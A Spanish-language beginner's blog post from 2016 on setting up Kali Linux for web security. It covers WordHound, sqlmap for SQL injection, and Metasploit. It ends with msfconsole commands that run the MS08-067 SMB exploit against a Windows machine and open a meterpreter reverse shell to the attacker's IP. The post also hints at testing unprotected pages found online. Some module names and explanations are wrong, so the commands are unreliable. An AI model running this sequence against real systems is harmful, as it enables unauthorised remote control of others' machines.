Cómo iniciar tu entorno de seguridad web con Kali Linux

Jeison Samir Castro S.
devStories
Published in
4 min readJul 6, 2016

En este post les comentaré acerca de seguridad web y como fueron mis primeros pasos con la herramienta Kali Linux con el uso de sus herramientas integradas.

Preparación del entorno e instalación de nuestras primeras herramientas.

Como primera consideración, la mayoría de las personas con experiencia en seguridad, colocan a Linux como una herramienta potente para este trabajo. Del mismo modo, recordemos que este sistema operativo está en la mayor parte de servidores del planeta.

Pero ¿cómo empezamos con Kali Linux?

La verdad es que casi todas las distros funcionan bien como nuestro primer entorno, pero en este caso Kali es una distro especializada y creada por la comunidad para temas de seguridad, pentesting, vulnerabilidad en red, sql injection entre otros. Veamos cómo comenzar.

1. En este primer paso la descarga es relativamente fácil, lo único que hacemos es ir a su website oficial (https://www.kali.org/) y descargamos el iso del sistema operativo.

2. Previamente a esto debe preparar una máquina virtual, en mi caso usé VirtualBox para la instalación del iso, la instalación es similar a la instalación de una distro con ubuntu (la distro mas familiar con los usuarios).

3. Una vez que tenemos corriendo el sistema, recordemos que nuestro usuario sera el root y nuestro password el que hayamos colocado en la instalación.

4. Estamos listos 😄.

Comenzando los primeros ataques de manera local

Antes de comenzar, recomiendo un libro muy bueno para empezar con seguridad web: “THE HACKER PLAYBOOK 2” — vamos a recordar siempre que no existe la seguridad al 100% y que la mayor prevención estará siempre en los usuarios finales — .

Mi primera herramienta: WordHound

Básicamente se trata de un generador de diccionarios, el cual a través de la url de una persona nos permite obtener todas aquellas palabras claves, como usuarios o con un poco mas de suerte las contraseñas que fluyen por sus redes sociales o base de datos.

Un poco de SQL Injection

Este término es bastante conocido en ataques a base de datos, pero debemos tener estas consideraciones:

  • Existen muchas otras herramientas, pero en lo personal usé SQLmap, si de por si somos usuario de linux vamos a recordar que existe un programa pequeño pero potente como es Nmap (un mapeador de los servicios y puertos abiertos que tenemos en nuestro ordenador).
  • En lo que he visto, y por la mayoría de tutoriales en la web, generalmente las páginas “atacadas” son escritas en php con mysql (no es para menos, por algo la web esta escrita y desde los inicios que esta surgió, se uso php como lenguaje del lado del servidor; posteriormente vinieron los frameworks).
  • Es muy probable que encontremos páginas que no sean vulnerables –esto influirá en el éxito que tengamos en nuestra primera experiencia de encontrar en la red alguna página sin protección.
  • Como recomendación personal, probemos con alguna página que hayamos creado en nuestro localhost y por supuesto que este conectada a alguna base de datos. Por lo general y esto ha pasado en la mayoría de gente dedicada al código “la seguridad es algo que vemos al final del trabajo”. Tanto es usado este término que de alguna manera no hacemos algo por considerarlo en un inicio (hablo como alguien que pasó por esto como freelancer, pero de trabajar en una organización bastante formal obviamente SEGURIDAD es una de las prioridades al inicio).
  • A lo que voy es que inicialmente trabajamos en local y nos centremos en que funcione nuestra app, no obstante esto nos servirá como un vivo ejemplo para atacar nuestra app y poder jugar con sqlmap.

Vamos por otros ambientes

Por ambientes me estoy refiriendo a SO en este caso a WINDOWS, esto es genial.

Windows es un SO vulnerable si no hacemos periódicamente una actualización y los tan amados y odiados parches. Pero el punto es que si instalamos otra máquina virtual con Windows + Kali podemos hacer mucho. Comenzamos ingresando al shell, una herramienta genial de Kali que nos facilita esto es Metasploit.

Tan simple como iniciar Metasploit desde la interfaz de Kali:

msf> use exploit/window/smb/ms08_067_metapi

En este comando asignamos la ip del usuario:

msf>set RHOST “ip del usuario”

Usamos payload para redireccionar al usuario a nuestro http:

msf>set payload window/meterpreter/reverse_tcp

Ingresamos nuestra ip:

msf>set LHOST “nuestra ip”

Con esto direccionamos a un nuevo puerto de salida en nuestra máquina, en mi caso uso el puerto 6666:

msf>set LPORT 6666

Y dejamos el trabajo sucio al comando exploit:

msf> exploit

--

--